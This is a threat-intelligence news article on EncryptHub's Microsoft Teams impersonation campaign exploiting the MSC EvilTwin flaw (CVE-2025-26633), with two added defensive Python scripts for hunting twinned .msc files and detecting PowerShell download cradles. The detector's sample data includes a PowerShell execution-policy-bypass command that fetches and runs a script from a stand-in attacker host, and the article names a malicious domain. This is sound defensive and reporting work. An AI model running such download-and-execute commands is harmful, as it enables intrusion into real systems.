A sophisticated social engineering campaign by the EncryptHub threat group combines impersonation tactics with technical exploitation to compromise corporate networks.
The Russian-linked cybercriminals are posing as IT support staff and using Microsoft Teams requests to establish remote access, ultimately deploying malicious payloads through a previously unknown Windows vulnerability.
The attack begins with threat actors claiming to be from internal IT departments and sending Microsoft Teams connection requests to targeted employees.
Once victims accept the request and establish a remote session, the attackers guide them through executing PowerShell commands that appear legitimate but actually download and run malicious scripts.
The initial command executed bypasses Windows security policies and downloads a PowerShell script called “runner.ps1” from attacker-controlled domains such as cjhsbam[.]com.
This script is designed to exploit CVE-2025-26633, a vulnerability in Microsoft’s Management Console framework dubbed “MSC EvilTwin”.
Microsoft Teams Requests Drop Malware
The MSC EvilTwin vulnerability allows attackers to execute malicious Microsoft Console (.msc) files by manipulating how the system loads these administrative tools.
The exploit works by dropping two .msc files with identical names – one legitimate and one malicious – in different directories. When the legitimate file is executed, the system inadvertently loads the malicious version from an alternate location, specifically the MUIPath directory.

“The malicious file is placed in a different directory, specifically in MUIPath, typically in the en-US folder. When the legitimate msc file is run, it triggers the mmc[.]exe process.
Due to the MSC EvilTwin vulnerability, mmc.exe first checks for a file with the same name in the MUIPath directory,” explained Trustwave researchers.
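The twin-file pattern described above is something a defender can hunt for directly: any .msc file that has a same-named file sitting in a culture sub-folder next to it (the en-US MUIPath folder in the Trustwave description) deserves a look, especially when the two copies differ. The following script is an added example, not code from the article or from Trustwave; it assumes that any folder named like a culture (en-US, de-DE, and so on) is a candidate MUIPath location, which generalises the en-US case the text describes, and it builds a small constructed directory tree so it can be run offline.

```python
import hashlib
import re
import tempfile
from pathlib import Path

# Folder names shaped like MUI culture directories (en-US, de-DE, ...).
# Treating every such folder as a candidate MUIPath is this example's own
# assumption; the article only describes the en-US case.
CULTURE_DIR = re.compile(r"^[a-z]{2,3}-[A-Z]{2}$")


def _sha256(path: Path) -> str:
    """Hash a file in chunks so large .msc files are not read into memory at once."""
    digest = hashlib.sha256()
    with path.open("rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def find_msc_twins(root) -> list[dict]:
    """Report every .msc file under `root` that has a same-named file in a
    sibling culture sub-folder, together with whether the two copies are identical."""
    findings = []
    for msc in sorted(Path(root).rglob("*")):
        if not (msc.is_file() and msc.suffix.lower() == ".msc"):
            continue
        if CULTURE_DIR.match(msc.parent.name):
            continue  # this file is itself a MUI copy; it is reported via its parent
        for sub in sorted(msc.parent.iterdir()):
            if not (sub.is_dir() and CULTURE_DIR.match(sub.name)):
                continue
            twin = sub / msc.name
            if twin.is_file():
                findings.append({
                    "legit": str(msc),
                    "twin": str(twin),
                    "culture": sub.name,
                    "identical": _sha256(msc) == _sha256(twin),
                })
    return findings


def build_demo_tree() -> Path:
    """Create a constructed sample tree (not real system files) with one
    twinned .msc file and one harmless .msc file, and return its root."""
    root = Path(tempfile.mkdtemp(prefix="msc-twins-"))
    (root / "en-US").mkdir()
    (root / "WmiMgmt.msc").write_bytes(b"<!-- constructed: legitimate console -->")
    (root / "en-US" / "WmiMgmt.msc").write_bytes(b"<!-- constructed: differing copy -->")
    (root / "eventvwr.msc").write_bytes(b"<!-- constructed: no twin -->")
    return root


if __name__ == "__main__":
    for hit in find_msc_twins(build_demo_tree()):
        status = "identical" if hit["identical"] else "DIFFERS"
        print(f"{hit['legit']} <-> {hit['twin']} [{hit['culture']}] {status}")
```

On a real host the scan would be pointed at the directories where consoles normally live and at user-writable locations; a same-named twin whose hash differs from the original is the case worth escalating, while identical copies are usually just localisation residue.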
After successful exploitation, the malware establishes persistence on infected machines and maintains continuous communication with command-and-control servers.
The system receives AES-encrypted commands that are decrypted locally and executed using PowerShell, granting attackers comprehensive remote control capabilities.
Among the payloads deployed is Fickle Stealer, a PowerShell-based information stealer designed to extract sensitive files, harvest system information, and steal cryptocurrency wallet data.
The malware also generates fake browser traffic to popular websites, helping disguise malicious command-and-control communications as normal network activity.
EncryptHub, also tracked as LARVA-208 and Water Gamayun, has been active since mid-2024 and represents a well-resourced Russian cybercriminal operation.
The group has compromised over 618 organizations worldwide as of February 2025, targeting sectors including Web3 developers and gaming platforms.
The threat actors have demonstrated sophisticated operational capabilities, including the abuse of legitimate platforms for malware distribution.
Researchers discovered that EncryptHub has been using Brave Support, the help platform for the Brave web browser, to host malicious ZIP archives containing their payloads.
This technique is particularly concerning as uploading files to Brave Support typically requires established accounts with upload permissions.
Beyond the initial Microsoft Teams social engineering, EncryptHub has developed an expanding arsenal of custom tools.

These include SilentCrystal, a Golang-compiled loader that mirrors PowerShell script functionality, and a SOCKS5 proxy backdoor that operates in both client and server modes.
The group has also created fake video conferencing platforms, such as RivaTalk, to lure victims into downloading malicious MSI installers. These platforms require access codes to download software, creating an additional layer of legitimacy while hindering security analysis.
CVE-2025-26633 was officially disclosed as a zero-day vulnerability in March 2025, though related attack samples were observed in the wild as early as February 2025. Microsoft has since released security patches, but the vulnerability continues to be actively exploited against unpatched systems.
The vulnerability carries a CVSS score of 7.0, indicating high severity, and has been added to the CISA Known Exploited Vulnerabilities catalog, underscoring its critical nature for federal agencies and enterprise environments.
The campaign highlights the persistent effectiveness of social engineering attacks combined with technical exploitation. “Social engineering remains one of the most effective tools in a cybercriminal’s arsenal, and the emerging threat group EncryptHub has hopped right on the bandwagon,” noted Trustwave researchers.
Cybersecurity experts recommend implementing multi-layered defense strategies, including immediate patching of CVE-2025-26633, enhanced monitoring of Microsoft Management Console activities, and comprehensive user awareness training focused on social engineering tactics.
Organizations should also restrict remote access capabilities and implement strict verification procedures for IT support interactions.
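Two of the recommendations above, monitoring Microsoft Management Console activity and watching for the PowerShell download step that starts the intrusion, can be expressed as simple detection logic over process-creation telemetry. The following is an added example, not code from the article or from Trustwave; the pipe-separated event format and the sample events are constructed for illustration (the download host is a placeholder, not the domain named in the article), and the rule thresholds are this example's own choices.

```python
import re
from dataclasses import dataclass

# Constructed sample process-creation events, one per line, in the order
# time|host|parent image|image|command line. Not real telemetry.
SAMPLE_EVENTS = """\
2025-03-01T10:02:11Z|WS-0412|ms-teams.exe|powershell.exe|powershell.exe -ExecutionPolicy Bypass -NoProfile -Command "iwr https://attacker.example/runner.ps1 -OutFile $env:TEMP\\runner.ps1; & $env:TEMP\\runner.ps1"
2025-03-01T10:02:40Z|WS-0412|powershell.exe|mmc.exe|mmc.exe C:\\Users\\jdoe\\AppData\\Local\\Temp\\WmiMgmt.msc
2025-03-01T10:05:03Z|WS-0099|explorer.exe|mmc.exe|mmc.exe C:\\Windows\\System32\\eventvwr.msc
2025-03-01T10:06:15Z|WS-0201|explorer.exe|powershell.exe|powershell.exe -NoProfile -File C:\\Scripts\\inventory.ps1
"""

# Execution-policy bypass switch, in its long and short spellings.
BYPASS = re.compile(r"-(?:ExecutionPolicy|ep|exec)\s+bypass", re.I)
# Common PowerShell download cradles.
CRADLE = re.compile(
    r"\b(?:iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|"
    r"downloadfile|net\.webclient|curl|wget)\b", re.I)
# A .msc path under a location an ordinary user can write to.
USER_WRITABLE_MSC = re.compile(
    r"\\(?:Users|AppData|Temp|ProgramData|Public)\\[^\s\"]*\.msc\b", re.I)
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}


@dataclass
class Finding:
    rule: str
    host: str
    image: str
    cmdline: str


def parse_events(text: str) -> list[dict]:
    """Split the constructed event format into dicts; the command line may itself contain '|'."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, host, parent, image, cmdline = line.split("|", 4)
        events.append({"ts": ts, "host": host, "parent": parent.lower(),
                       "image": image.lower(), "cmdline": cmdline})
    return events


def detect(text: str) -> list[Finding]:
    """Apply three rules aimed at the chain described in the article: a bypass-plus-download
    PowerShell launch, mmc.exe loading a console from a user-writable path, and mmc.exe
    started by a scripting host rather than by the shell."""
    findings = []
    for ev in parse_events(text):
        image = ev["image"].rsplit("\\", 1)[-1]
        parent = ev["parent"].rsplit("\\", 1)[-1]
        cmd = ev["cmdline"]
        if image in {"powershell.exe", "pwsh.exe"} and BYPASS.search(cmd) and CRADLE.search(cmd):
            findings.append(Finding("powershell_bypass_download_cradle", ev["host"], image, cmd))
        if image == "mmc.exe":
            if USER_WRITABLE_MSC.search(cmd):
                findings.append(Finding("mmc_loads_msc_from_user_writable_path", ev["host"], image, cmd))
            if parent in SCRIPT_HOSTS:
                findings.append(Finding("mmc_spawned_by_script_host", ev["host"], image, cmd))
    return findings


if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f"[{f.rule}] {f.host}: {f.cmdline}")
```

Run against the constructed events, the first two lines produce findings while the routine eventvwr.msc launch and the ordinary scripted inventory run do not; in production the same rules would sit on Sysmon or EDR process-creation events, with the user-writable path list and cradle keywords tuned to the environment.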
The EncryptHub campaign demonstrates how modern threat actors continue to evolve their tactics, combining trusted communication platforms like Microsoft Teams with sophisticated technical exploits to achieve their objectives.
IoCs

The post Hackers Mimic IT Teams to Exploit Microsoft Teams Request to Gain System Remote Access appeared first on Cyber Security News.